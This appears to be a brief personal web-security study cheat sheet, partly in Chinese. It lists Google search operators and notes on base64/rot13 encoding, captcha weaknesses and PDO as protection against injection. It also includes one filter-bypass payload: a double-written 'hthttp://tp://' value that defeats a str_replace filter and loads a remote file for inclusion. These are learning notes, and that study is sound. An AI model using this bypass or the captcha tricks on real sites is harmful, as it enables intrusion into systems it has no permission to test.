“CESIGN”
linux -ubuntu
site:cesign.com hello
~hello
"hello *"
ubuntu 2008..2010
filetype:pdf how to learn
ubuntu or linux
define:word
intext:word1 word2 word3
intitle:word
cache:hdu.edu.cn
info:keyword
inurl:keyword
site:url
related:url
like a letter you don't know eg:"I l?ve"
加密方法 base64,rot13
`工具 chrome插件:http-header修改:modify headers`
`验证码常有三种错误:(1)一个验证码可重复用,不过期;(2)验证码只能用一次,但后台清空后可以构造为空;`
使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。 例如page=hthttp://tp://192.168.5.12/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.5.12/phpinfo.txt,成功执行远程命令。
学习地址
防注可以用PDO技术 [学习地址](http://www.jb51.net/article/56612.htm)